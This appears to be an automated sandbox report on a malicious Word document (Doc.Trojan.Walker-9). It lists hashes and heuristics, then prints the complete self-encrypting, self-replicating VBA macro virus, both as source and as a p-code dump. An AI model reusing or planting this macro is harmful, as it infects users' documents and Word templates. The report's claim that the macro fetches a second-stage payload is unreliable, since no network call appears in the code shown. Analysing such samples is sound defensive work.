Office (OLE) malware analysis — malicious · b3a74ee93dd7b085

MALICIOUS

Office (OLE)

62.0 KB Created: 2002-12-10 12:49:00 Authoring application: Microsoft Word 10.0 First seen: 2017-03-05

MD5: c7fe9d038222a642ecc26ba54d5c32e0 SHA-1: 14504b38ce4207b5629b40e92218f7e396ea7c9d SHA-256: b3a74ee93dd7b085c0251d9ccec5a337327ae40cc4c96f019a6bf88c6438d9f3

88 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The macro code appears to be obfuscated and attempts to decrypt and execute further code. The ClamAV detection 'Doc.Trojan.Walker-9' strongly suggests malicious intent, likely involving the download of a second-stage payload.

Heuristics 3

ClamAV: Doc.Trojan.Walker-9 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Walker-9
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

End Function
Private Sub Document_Open()
On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11923 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11923 bytes
SHA-256: `8f3921c31cbd47fa843de6c23783c484ecac7e4af1fd1955004162dc4eb5aae8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Sattelite v1.0 'Document Private Function encr(s, k As Integer) Dim r: r = "": For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next: encr = r End Function Private Sub Document_Open() On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH) WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1) If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule With Iam: .ReplaceLine 101, Kar: Z = .CountOfLines - 27: For x = 63 To Z: If W = 20 Then W = 0 decrypt = .Lines(x, 1): W = W + 2: Y = Len(decrypt): Y = Y - 1: decrypt = Right$(decrypt, Y): .ReplaceLine x + 20, encr(decrypt, (W)): Next x: End With Call ThisDoc: Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule: Flag = 0: GoTo Over Again: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Flag = 1 Over: With Iam: For x = 83 To 100: .ReplaceLine x, "'": Next x: End With If Flag = 0 Then GoTo Again End Sub Private Sub ThisDoc() ' ' 'Ml"Gppmp"Pgqwog"Lgzv 'EtthmgepmkjAjefhaGejgahOa}$9$s`Gejgah@mwefha` 'Ivroihu(PotsuVtirceroih&;&@gjuc 'Gx\|agf{&[i~mFgzeidXzgex\|(5(Nid{m 'Yo~Ki~Ikxxcox7Ki~c\|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo '_ix,Bc~aOm~~ei~,1,Bc~am`Xia\|`mxi"ZN\~cfiox"ZNOca\|cbibx $=%"OchiAchy`i '@G.3.@a\|cobZkc~bozk XL^\|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?' 'QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te\|u>\y~uc8$"<0!9 '[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw\|2\}` [\|afs~~wv2/2F`gw2W~aw2\}` [\|afs~~wv2/2Ts~aw ']r4AWugq<Z]=4(463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg44$4@\|qz4Ql}`4Gav 'Kd"WAcqgCK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg 'Mb$QGewa,EM-$8:$&#WEPPAHMPA$R54&$Ej`$EgpGevvmavGkqjpKbHmjaw$:$4$Plaj$A\|mp$Wqf 'O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd 'An(FgzeAf{\|iddml(5(Nid{m(\`mf2([m\|(Afnmk\|agf(5(FgzeKizzamz2([m\|(Kizzamz(5(Ik\|Kizzamz2(Md{m2([m\|(Afnmk\|agf(5(Ik\|Kizzamz2([m\|(Kizzamz(5(FgzeKizzamz ']c~bIkxxcox0\cxIeno7$Fcdoy";&$Ie d~ElFcdoy#0Odn]c~b '[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi 'Gh.@a\|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a\|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z, 'U~t0Gydx ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' 4701 End Sub Private Sub Document_Close() WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1): CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH) If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Kar2 = Iam.Lines(101, 1): Iam.ReplaceLine 101, "'": NormalTemplate.Save: If Kar = Kar2 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End Sub ' Processing file: /opt/analyzer/scan_staging/e6afa23801d84e478ef4281dd0472d8e.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 10337 bytes ' Line #0: ' Line #1: ' Line #2: ' Line #3: ' Line #4: ' Line #5: ' Line #6: ' Line #7: ' Line #8: ' Line #9: ' Line #10: ' Line #11: ' Line #12: ' Line #13: ' Line #14: ' Line #15: ' Line #16: ' Line #17: ' Line #18: ' Line #19: ' Line #20: ' Line #21: ' Line #22: ' Line #23: ' Line #24: ' Line #25: ' Line #26: ' Line #27: ' Line #28: ' Line #29: ' Line #30: ' Line #31: ' Line #32: ' Line #33: ' Line #34: ' Line #35: ' Line #36: ' Line #37: ' Line #38: ' Line #39: ' Line #40: ' Line #41: ' QuoteRem 0x0000 0x000E "Sattelite v1.0" ' Line #42: ' QuoteRem 0x0000 0x0008 "Document" ' Line #43: ' FuncDefn (Private Function encr(s, k As Integer, id_FFFE As Variant)) ' Line #44: ' Dim ' VarDefn r ' BoS 0x0000 ' LitStr 0x0000 "" ' St r ' BoS 0x0000 ' StartForVariable ' Ld False ' EndForVariable ' LitDI2 0x0001 ' Ld s ' FnLen ' For ' BoS 0x0000 ' Ld r ' Ld s ' Ld False ' LitDI2 0x0001 ' ArgsLd Mid$$ 0x0003 ' ArgsLd Asc 0x0001 ' Paren ' Ld k ' Xor ' ArgsLd Chr 0x0001 ' Add ' St r ' BoS 0x0000 ' StartForVariable ' Next ' BoS 0x0000 ' Ld r ' St encr ' Line #45: ' EndFunc ' Line #46: ' FuncDefn (Private Sub Document_Open()) ' Line #47: ' OnError (Resume Next) ' BoS 0x0000 ' LitDI2 0x0000 ' St W ' BoS 0x0000 ' Ld Word ' MemLd ActiveDocument ' MemLd Characters ' MemLd Count ' St CH ' BoS 0x0000 ' LitStr 0x0001 "'" ' Ld CH ' ArgsLd Str 0x0001 ' Add ' St Kar ' Line #48: ' LitDI2 0x002B ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St WhereAmI ' Line #49: ' Ld WhereAmI ' LitStr 0x000F "'NormalTemplate" ' Eq ' If ' BoSImplicit ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set Iam ' Else ' BoSImplicit ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set Iam ' EndIf ' Line #50: ' StartWithExpr ' Ld Iam ' With ' BoS 0x0000 ' LitDI2 0x0065 ' Ld Kar ' ArgsMemCallWith ReplaceLine 0x0002 ' BoS 0x0000 ' MemLdWith CountOfLines ' LitDI2 0x001B ' Sub ' St Z ' BoS 0x0000 ' StartForVariable ' Ld x ' EndForVariable ' LitDI2 0x003F ' Ld Z ' For ' BoS 0x0000 ' Line #51: ' Ld W ' LitDI2 0x0014 ' Eq ' If ' BoSImplicit ' LitDI2 0x0000 ' St W ' EndIf ' Line #52: ' Ld x ' LitDI2 0x0001 ' ArgsMemLdWith Lines 0x0002 ' St decrypt ' BoS 0x0000 ' Ld W ' LitDI2 0x0002 ' Add ' St W ' BoS 0x0000 ' Ld decrypt ' FnLen ' St Y ' BoS 0x0000 ' Ld Y ' LitDI2 0x0001 ' Sub ' St Y ' BoS 0x0000 ' Ld decrypt ' Ld Y ' ArgsLd Right$ 0x0002 ' St decrypt ' BoS 0x0000 ' Ld x ' LitDI2 0x0014 ' Add ' Ld decrypt ' Ld W ' Paren ' ArgsLd encr 0x0002 ' ArgsMemCallWith ReplaceLine 0x0002 ' BoS 0x0000 ' StartForVariable ' Ld x ' EndForVariable ' NextVar ' BoS 0x0000 ' EndWith ' Line #53: ' ArgsCall (Call) ThisDoc 0x0000 ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set Iam ' BoS 0x0000 ' LitDI2 0x0000 ' St Flag ' BoS 0x0000 ' GoTo Over ' Line #54: ' Label Again ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set Iam ' BoS 0x0000 ' LitDI2 0x0001 ' St Flag ' Line #55: ' Label Over ' Line #56: ' StartWithExpr ' Ld Iam ' With ' BoS 0x0000 ' StartForVariable ' Ld x ' EndForVariable ' LitDI2 0x0053 ' LitDI2 0x0064 ' For ' BoS 0x0000 ' Ld x ' LitStr 0x0001 "'" ' ArgsMemCallWith ReplaceLine 0x0002 ' BoS 0x0000 ' StartForVariable ' Ld x ' EndForVariable ' NextVar ' BoS 0x0000 ' EndWith ' Line #57: ' Ld Flag ' LitDI2 0x0000 ' Eq ' If ' BoSImplicit ' GoTo Again ' EndIf ' Line #58: ' EndSub ' Line #59: ' FuncDefn (Private Sub ThisDoc()) ' Line #60: ' QuoteRem 0x0000 0x0000 "" ' Line #61: ' QuoteRem 0x0000 0x0000 "" ' Line #62: ' QuoteRem 0x0000 0x0014 "Ml"Gppmp"Pgqwog"Lgzv" ' Line #63: ' QuoteRem 0x0000 0x002E "EtthmgepmkjAjefhaGejgahOa}$9$s`Gejgah@mwefha`" ' Line #64: ' QuoteRem 0x0000 0x001F "Ivroihu(PotsuVtirceroih&;&@gjuc" ' Line #65: ' QuoteRem 0x0000 0x0020 "Gx\|agf{&[i~mFgzeidXzgex\|(5(Nid{m" ' Line #66: ' QuoteRem 0x0000 0x0044 "Yo~Ki~Ikxxcox7Ki~c\|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo" ' Line #67: ' QuoteRem 0x0000 0x0045 "_ix,Bc~aOm~~ei~,1,Bc~am`Xia\|`mxi"ZN\~cfiox"ZNOca\|cbibx $=%"OchiAchy`i" ' Line #68: ' QuoteRem 0x0000 0x0045 "@G.3.@a\|cobZkc~bozk XL^\|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?'" ' Line #69: ' QuoteRem 0x0000 0x0045 "QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te\|u>\y~uc8$"<0!9" ' Line #70: ' QuoteRem 0x0000 0x0055 "[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw\|2\}` [\|afs~~wv2/2F`gw2W~aw2\}` [\|afs~~wv2/2Ts~aw" ' Line #71: ' QuoteRem 0x0000 0x0050 "]r4AWugq<Z]=4(463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg44$4@\|qz4Ql}`4Gav" ' Line #72: ' QuoteRem 0x0000 0x0053 "Kd"WAcqgCK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg" ' Line #73: ' QuoteRem 0x0000 0x004F "Mb$QGewa,EM-$8:$&#WEPPAHMPA$R54&$Ej`$EgpGevvmavGkqjpKbHmjaw$:$4$Plaj$A\|mp$Wqf" ' Line #74: ' QuoteRem 0x0000 0x003D "O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd" ' Line #75: ' QuoteRem 0x0000 0x0091 "An(FgzeAf{\|iddml(5(Nid{m(\`mf2([m\|(Afnmk\|agf(5(FgzeKizzamz2([m\|(Kizzamz(5(Ik\|Kizzamz2(Md{m2([m\|(Afnmk\|agf(5(Ik\|Kizzamz2([m\|(Kizzamz(5(FgzeKizzamz" ' Line #76: ' QuoteRem 0x0000 0x003A "]c~bIkxxcox0\cxIeno7$Fcdoy";&$Ie d~ElFcdoy#0Odn]c~b" ' Line #77: ' QuoteRem 0x0000 0x0046 "[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi" ' Line #78: ' QuoteRem 0x0000 0x0062 "Gh.@a\|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a\|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z," ' Line #79: ' QuoteRem 0x0000 0x0008 "U~t0Gydx" ' Line #80: ' QuoteRem 0x0000 0x0000 "" ' Line #81: ' QuoteRem 0x0000 0x0000 "" ' Line #82: ' QuoteRem 0x0000 0x0000 "" ' Line #83: ' QuoteRem 0x0000 0x0000 "" ' Line #84: ' QuoteRem 0x0000 0x0000 "" ' Line #85: ' QuoteRem 0x0000 0x0000 "" ' Line #86: ' QuoteRem 0x0000 0x0000 "" ' Line #87: ' QuoteRem 0x0000 0x0000 "" ' Line #88: ' QuoteRem 0x0000 0x0000 "" ' Line #89: ' QuoteRem 0x0000 0x0000 "" ' Line #90: ' QuoteRem 0x0000 0x0000 "" ' Line #91: ' QuoteRem 0x0000 0x0000 "" ' Line #92: ' QuoteRem 0x0000 0x0000 "" ' Line #93: ' QuoteRem 0x0000 0x0000 "" ' Line #94: ' QuoteRem 0x0000 0x0000 "" ' Line #95: ' QuoteRem 0x0000 0x0000 "" ' Line #96: ' QuoteRem 0x0000 0x0000 "" ' Line #97: ' QuoteRem 0x0000 0x0000 "" ' Line #98: ' QuoteRem 0x0000 0x0000 "" ' Line #99: ' QuoteRem 0x0000 0x0000 "" ' Line #100: ' QuoteRem 0x0000 0x0005 " 4701" ' Line #101: ' EndSub ' Line #102: ' FuncDefn (Private Sub Document_Close()) ' Line #103: ' LitDI2 0x002B ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St WhereAmI ' BoS 0x0000 ' Ld Word ' MemLd ActiveDocument ' MemLd Characters ' MemLd Count ' St CH ' BoS 0x0000 ' LitStr 0x0001 "'" ' Ld CH ' ArgsLd Str 0x0001 ' Add ' St Kar ' Line #104: ' Ld WhereAmI ' LitStr 0x000F "'NormalTemplate" ' Eq ' If ' BoSImplicit ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set Iam ' Else ' BoSImplicit ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set Iam ' BoS 0x0000 ' EndIf ' Line #105: ' LitDI2 0x0065 ' LitDI2 0x0001 ' Ld Iam ' ArgsMemLd Lines 0x0002 ' St Kar2 ' BoS 0x0000 ' LitDI2 0x0065 ' LitStr 0x0001 "'" ' Ld Iam ' ArgsMemCall ReplaceLine 0x0002 ' BoS 0x0000 ' Ld NormalTemplate ' ArgsMemCall Save 0x0000 ' BoS 0x0000 ' Ld Kar ' Ld Kar2 ' Eq ' If ' BoSImplicit ' Ld ActiveDocument ' MemLd FullName ' ParamNamed FileName ' Ld wdFormatDocument ' ParamNamed FileFormat ' Ld ActiveDocument ' ArgsMemCall SaveAs 0x0002 ' EndIf ' Line #106: ' EndSub

SHA-256: 8f3921c31cbd47fa843de6c23783c484ecac7e4af1fd1955004162dc4eb5aae8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True









































'Sattelite v1.0
'Document
Private Function encr(s, k As Integer)
Dim r: r = "": For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next: encr = r
End Function
Private Sub Document_Open()
On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1)
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Iam: .ReplaceLine 101, Kar: Z = .CountOfLines - 27: For x = 63 To Z:
If W = 20 Then W = 0
decrypt = .Lines(x, 1): W = W + 2: Y = Len(decrypt): Y = Y - 1: decrypt = Right$(decrypt, Y): .ReplaceLine x + 20, encr(decrypt, (W)): Next x: End With
Call ThisDoc: Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule: Flag = 0: GoTo Over
Again: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Flag = 1
Over:
With Iam: For x = 83 To 100: .ReplaceLine x, "'": Next x: End With
If Flag = 0 Then GoTo Again
End Sub
Private Sub ThisDoc()
'
'
'Ml"Gppmp"Pgqwog"Lgzv
'Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha`
'Ivroihu(PotsuVtirceroih&;&@gjuc
'Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m
'Yo~*Ki~Ikxxcox*7*Ki~c|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo
'_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx $=%"OchiAchy`i
'@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?'
'QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te|u>\y~uc8$"<0!9
'[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}` [|afs~~wv2/2F`gw2W~aw2\}` [|afs~~wv2/2Ts~aw
']r4AWugq<Z]=4(*463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg4*4$4@|qz4Ql}`4Gav
'Kd"WAcqg*CK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg
'Mb$QGewa,EM-$8:$&#WEPPAHMPA$R5*4&$Ej`$EgpGevvmav*GkqjpKbHmjaw$:$4$Plaj$A|mp$Wqf
'O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd
'An(FgzeAf{|iddml(5(Nid{m(\`mf2([m|(Afnmk|agf(5(FgzeKizzamz2([m|(Kizzamz(5(Ik|Kizzamz2(Md{m2([m|(Afnmk|agf(5(Ik|Kizzamz2([m|(Kizzamz(5(FgzeKizzamz
']c~b*Ikxxcox0*\cxIeno*7*$Fcdoy";&*$Ie d~ElFcdoy#0*Odn*]c~b
'[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi
'Gh.@a|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z,
'U~t0Gydx
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
' 4701
End Sub
Private Sub Document_Close()
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1): CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule:
Kar2 = Iam.Lines(101, 1): Iam.ReplaceLine 101, "'": NormalTemplate.Save: If Kar = Kar2 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub

' Processing file: /opt/analyzer/scan_staging/e6afa23801d84e478ef4281dd0472d8e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10337 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' Line #39:
' Line #40:
' Line #41:
' 	QuoteRem 0x0000 0x000E "Sattelite v1.0"
' Line #42:
' 	QuoteRem 0x0000 0x0008 "Document"
' Line #43:
' 	FuncDefn (Private Function encr(s, k As Integer, id_FFFE As Variant))
' Line #44:
' 	Dim 
' 	VarDefn r
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St r 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld False 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld s 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld r 
' 	Ld s 
' 	Ld False 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Paren 
' 	Ld k 
' 	Xor 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St r 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	Ld r 
' 	St encr 
' Line #45:
' 	EndFunc 
' Line #46:
' 	FuncDefn (Private Sub Document_Open())
' Line #47:
' 	OnError (Resume Next) 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	St W 
' 	BoS 0x0000 
' 	Ld Word 
' 	MemLd ActiveDocument 
' 	MemLd Characters 
' 	MemLd Count 
' 	St CH 
' 	BoS 0x0000 
' 	LitStr 0x0001 "'"
' 	Ld CH 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	St Kar 
' Line #48:
' 	LitDI2 0x002B 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St WhereAmI 
' Line #49:
' 	Ld WhereAmI 
' 	LitStr 0x000F "'NormalTemplate"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	Else 
' 	BoSImplicit 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	EndIf 
' Line #50:
' 	StartWithExpr 
' 	Ld Iam 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0065 
' 	Ld Kar 
' 	ArgsMemCallWith ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	MemLdWith CountOfLines 
' 	LitDI2 0x001B 
' 	Sub 
' 	St Z 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x003F 
' 	Ld Z 
' 	For 
' 	BoS 0x0000 
' Line #51:
' 	Ld W 
' 	LitDI2 0x0014 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St W 
' 	EndIf 
' Line #52:
' 	Ld x 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	St decrypt 
' 	BoS 0x0000 
' 	Ld W 
' 	LitDI2 0x0002 
' 	Add 
' 	St W 
' 	BoS 0x0000 
' 	Ld decrypt 
' 	FnLen 
' 	St Y 
' 	BoS 0x0000 
' 	Ld Y 
' 	LitDI2 0x0001 
' 	Sub 
' 	St Y 
' 	BoS 0x0000 
' 	Ld decrypt 
' 	Ld Y 
' 	ArgsLd Right$ 0x0002 
' 	St decrypt 
' 	BoS 0x0000 
' 	Ld x 
' 	LitDI2 0x0014 
' 	Add 
' 	Ld decrypt 
' 	Ld W 
' 	Paren 
' 	ArgsLd encr 0x0002 
' 	ArgsMemCallWith ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	EndWith 
' Line #53:
' 	ArgsCall (Call) ThisDoc 0x0000 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	St Flag 
' 	BoS 0x0000 
' 	GoTo Over 
' Line #54:
' 	Label Again 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set Iam 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	St Flag 
' Line #55:
' 	Label Over 
' Line #56:
' 	StartWithExpr 
' 	Ld Iam 
' 	With 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	LitDI2 0x0053 
' 	LitDI2 0x0064 
' 	For 
' 	BoS 0x0000 
' 	Ld x 
' 	LitStr 0x0001 "'"
' 	ArgsMemCallWith ReplaceLine 0x0002 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld x 
' 	EndForVariable 
' 	NextVar 
' 	BoS 0x0000 
' 	EndWith 
' Line #57:
' 	Ld Flag 
' 	LitDI2 0x0000 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo Again 
' 	EndIf 
' Line #58:
' 	EndSub 
' Line #59:
' 	FuncDefn (Private Sub ThisDoc())
' Line #60:
' 	QuoteRem 0x0000 0x0000 ""
' Line #61:
' 	QuoteRem 0x0000 0x0000 ""
' Line #62:
' 	QuoteRem 0x0000 0x0014 "Ml"Gppmp"Pgqwog"Lgzv"
' Line #63:
' 	QuoteRem 0x0000 0x002E "Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha`"
' Line #64:
' 	QuoteRem 0x0000 0x001F "Ivroihu(PotsuVtirceroih&;&@gjuc"
' Line #65:
' 	QuoteRem 0x0000 0x0020 "Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m"
' Line #66:
' 	QuoteRem 0x0000 0x0044 "Yo~*Ki~Ikxxcox*7*Ki~c|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo"
' Line #67:
' 	QuoteRem 0x0000 0x0045 "_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx $=%"OchiAchy`i"
' Line #68:
' 	QuoteRem 0x0000 0x0045 "@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?'"
' Line #69:
' 	QuoteRem 0x0000 0x0045 "QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te|u>\y~uc8$"<0!9"
' Line #70:
' 	QuoteRem 0x0000 0x0055 "[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}` [|afs~~wv2/2F`gw2W~aw2\}` [|afs~~wv2/2Ts~aw"
' Line #71:
' 	QuoteRem 0x0000 0x0050 "]r4AWugq<Z]=4(*463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg4*4$4@|qz4Ql}`4Gav"
' Line #72:
